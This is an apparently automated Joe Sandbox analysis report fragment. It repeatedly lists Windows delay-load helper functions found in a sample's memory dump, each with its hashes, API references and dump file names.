                                                            • Opcode ID: 8d7486c7bbd9d9f37b19420c38e357f3c68fee945c0138dd2664e9eac29698cf
                                                            • Instruction ID: 11d7a00adc135997a59bd6a9ff345cf77f83811460d13aecf9e7d6d955a08972
                                                            • Opcode Fuzzy Hash: 8d7486c7bbd9d9f37b19420c38e357f3c68fee945c0138dd2664e9eac29698cf
                                                            • Instruction Fuzzy Hash: F6B012E526D1C0BC314853071C42C3B018DC0C0B22F30427EF825C40C0FA80EC881432
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00BEE1E3
                                                              • Part of subcall function 00BEE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BEE8D0
                                                              • Part of subcall function 00BEE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BEE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 305d2553e004cac6e785b222bd56d276d478eaa3fac44a75e9535ce3dd1cdc0c
                                                            • Instruction ID: fd64ecfeb950a7ee13493b00b18842824f4f77a2f0e1e4622890f2ab35d29a95
                                                            • Opcode Fuzzy Hash: 305d2553e004cac6e785b222bd56d276d478eaa3fac44a75e9535ce3dd1cdc0c
                                                            • Instruction Fuzzy Hash: 19B012D536D0C0AC310852071C42C3B018DC0C1B21F30817EFC25C40C0FA40EC441432
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00BEE3FC
                                                              • Part of subcall function 00BEE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BEE8D0
                                                              • Part of subcall function 00BEE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BEE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: a03891ac1f4524b071432d79cee05fc8e7ebd3d72f894ee1cc251f2537a77ff4
                                                            • Instruction ID: 37c0d1392734ed19fae858e3be3d4a83950712ff9de12481f20485c80b0ef530
                                                            • Opcode Fuzzy Hash: a03891ac1f4524b071432d79cee05fc8e7ebd3d72f894ee1cc251f2537a77ff4
                                                            • Instruction Fuzzy Hash: D2B012F12680C0BC731892061C42C37028CC0C0F10B30827EF824C50C0EA40CE045833
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00BEE3FC
                                                              • Part of subcall function 00BEE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BEE8D0
                                                              • Part of subcall function 00BEE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BEE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 3b1750aa7f93ac272ef71b6575db545d3300f33fd9f2fc8fb93afbe16cdcb861
                                                            • Instruction ID: e446ff59030852611c5c7e8cd8b3b9c5e9fd28d6a66fa785f0684aa82669b852
                                                            • Opcode Fuzzy Hash: 3b1750aa7f93ac272ef71b6575db545d3300f33fd9f2fc8fb93afbe16cdcb861
                                                            • Instruction Fuzzy Hash: F7B012E126C0C07C721852071D42C77028CC0C0B10B30C27EF524C50C0EB418C4D5433
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00BEE3FC
                                                              • Part of subcall function 00BEE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BEE8D0
                                                              • Part of subcall function 00BEE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BEE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 135a5ebd10394bc00d6f017f8e5eda6020d68b921c99b5b62f11a01f27030d83
                                                            • Instruction ID: 87529eb463eda3a80769eb8978629411bd95e5d85aee849b680979252a7a1499
                                                            • Opcode Fuzzy Hash: 135a5ebd10394bc00d6f017f8e5eda6020d68b921c99b5b62f11a01f27030d83
                                                            • Instruction Fuzzy Hash: 61B012E126C0C0BC721892061C42C37028CC0C0B10B30C27EF824C50C0EB40CC0C5433
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00BEE580
                                                              • Part of subcall function 00BEE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BEE8D0
                                                              • Part of subcall function 00BEE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BEE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 54a60f14a438feb20431c8bc3c730978ed1ce08d382ebfa45302903a4cfc60f5
                                                            • Instruction ID: 4115c6f918707714ceb22807fd7b2bd8b8cb0a3f02f7d64571dba422dfa0ab13
                                                            • Opcode Fuzzy Hash: 54a60f14a438feb20431c8bc3c730978ed1ce08d382ebfa45302903a4cfc60f5
                                                            • Instruction Fuzzy Hash: A7B012C12681C07C714453565C87C3B01ECC0C0B11F30437EF424C10C0FA808C480431
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00BEE580
                                                              • Part of subcall function 00BEE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BEE8D0
                                                              • Part of subcall function 00BEE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BEE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 5c49d47b58d6d5bd2b335caf662d6fcd822776ded7758601ce57b1483f37d99a
                                                            • Instruction ID: 0b3ce561de9136a4c71d86f2061f7c617a1119c14cb26a778f662bce0f214785
                                                            • Opcode Fuzzy Hash: 5c49d47b58d6d5bd2b335caf662d6fcd822776ded7758601ce57b1483f37d99a
                                                            • Instruction Fuzzy Hash: 20B012C12680C07C710453565D86C3B01ECC0C0B10F30437EF424C10C0FE418D491431
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00BEE580
                                                              • Part of subcall function 00BEE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BEE8D0
                                                              • Part of subcall function 00BEE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BEE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: ab12f49cf4cff9d2e665049ce349f010704aac0550869083e3e6e39613809327
                                                            • Instruction ID: 14a66f308520ee849db0ff2bd2e8ce2d21fcc11d734d01f58aab8064a8e893d0
                                                            • Opcode Fuzzy Hash: ab12f49cf4cff9d2e665049ce349f010704aac0550869083e3e6e39613809327
                                                            • Instruction Fuzzy Hash: D9B012C12681C07D710453561C82C3B01DCC0C0B10F30437EF824C50C0FA408C080431
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00BEE51F
                                                              • Part of subcall function 00BEE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BEE8D0
                                                              • Part of subcall function 00BEE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BEE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: d41204b87f0da638637de022b0368b136c83fd17825ddbaa6da76cb4376dd2b6
                                                            • Instruction ID: 709ef50274e6aa4d38ae8d16fd76072fd6f69bd21ad2661da2d2a4dbe1bdc66f
                                                            • Opcode Fuzzy Hash: d41204b87f0da638637de022b0368b136c83fd17825ddbaa6da76cb4376dd2b6
                                                            • Instruction Fuzzy Hash: 56B012C12685C0BD7108520A1D52D3B01CCC4C1F10F30417EF824C40C0FE408C040431
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00BEE51F
                                                              • Part of subcall function 00BEE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BEE8D0
                                                              • Part of subcall function 00BEE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BEE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: af9c9c567fc710a98181c203285b403d47227476ec94897c38fcc9078f4752d8
                                                            • Instruction ID: 76e4d007db9a0bb1de8ecb6df16c032f33397a1f63c171e27bf982963e6024cb
                                                            • Opcode Fuzzy Hash: af9c9c567fc710a98181c203285b403d47227476ec94897c38fcc9078f4752d8
                                                            • Instruction Fuzzy Hash: A5B012C12684C0BC7108520A1D52C3B05CCC4C1F10F30817EF824C40C0FE418C450431
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00BEE51F
                                                              • Part of subcall function 00BEE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BEE8D0
                                                              • Part of subcall function 00BEE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BEE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 63d7e5e9884ed2ee2f20519c3d5a217e8733576e126e080cc10f1449958df96e
                                                            • Instruction ID: 6508268fee1d17fbe6ada4fcc4b68b94d10f585a1c40b237d1f9ce96e171776d
                                                            • Opcode Fuzzy Hash: 63d7e5e9884ed2ee2f20519c3d5a217e8733576e126e080cc10f1449958df96e
                                                            • Instruction Fuzzy Hash: A7B012D12684C0BC710812261D56C3B018CC4C1F10F30417EF470C04C1BA408D080831
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00BEE51F
                                                              • Part of subcall function 00BEE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BEE8D0
                                                              • Part of subcall function 00BEE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BEE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00BEE1E3
                                                              • Part of subcall function 00BEE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BEE8D0
                                                              • Part of subcall function 00BEE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BEE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                             • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00BEE1E3
                                                              • Part of subcall function 00BEE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BEE8D0
                                                              • Part of subcall function 00BEE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BEE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: eedb327ce2da66395844bfba4bb49ff865a3b6337a5a63fdf19cec1340010e67
                                                            • Instruction ID: 50369341179adea631a4d429c03d7663af7c89abcba9a7e76ac74e28d6934bc1
                                                            • Opcode Fuzzy Hash: eedb327ce2da66395844bfba4bb49ff865a3b6337a5a63fdf19cec1340010e67
                                                            • Instruction Fuzzy Hash: F6A002D515D181BC710852535D56C37015DC4C5B51730457DF826D44C17A50A8455471
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00BEE1E3
                                                              • Part of subcall function 00BEE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BEE8D0
                                                              • Part of subcall function 00BEE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BEE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: d8a806ec08b27635fc86ca88256ef8f8b19895b4b294e79d156b975eb55f8f93
                                                            • Instruction ID: 50369341179adea631a4d429c03d7663af7c89abcba9a7e76ac74e28d6934bc1
                                                            • Opcode Fuzzy Hash: d8a806ec08b27635fc86ca88256ef8f8b19895b4b294e79d156b975eb55f8f93
                                                            • Instruction Fuzzy Hash: F6A002D515D181BC710852535D56C37015DC4C5B51730457DF826D44C17A50A8455471
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00BEE1E3
                                                              • Part of subcall function 00BEE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BEE8D0
                                                              • Part of subcall function 00BEE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BEE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 15cbead8d94cf7a60dc3343f6c22033a6bdf3456a9bd300718bb26e24e00762c
                                                            • Instruction ID: 50369341179adea631a4d429c03d7663af7c89abcba9a7e76ac74e28d6934bc1
                                                            • Opcode Fuzzy Hash: 15cbead8d94cf7a60dc3343f6c22033a6bdf3456a9bd300718bb26e24e00762c
                                                            • Instruction Fuzzy Hash: F6A002D515D181BC710852535D56C37015DC4C5B51730457DF826D44C17A50A8455471
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00BEE1E3
                                                              • Part of subcall function 00BEE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BEE8D0
                                                              • Part of subcall function 00BEE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BEE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: be7cc01b4b48c0151631ce5b39106d996533b8ba59c1f218ecd8877f65082800
                                                            • Instruction ID: 50369341179adea631a4d429c03d7663af7c89abcba9a7e76ac74e28d6934bc1
                                                            • Opcode Fuzzy Hash: be7cc01b4b48c0151631ce5b39106d996533b8ba59c1f218ecd8877f65082800
                                                            • Instruction Fuzzy Hash: F6A002D515D181BC710852535D56C37015DC4C5B51730457DF826D44C17A50A8455471
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00BEE1E3
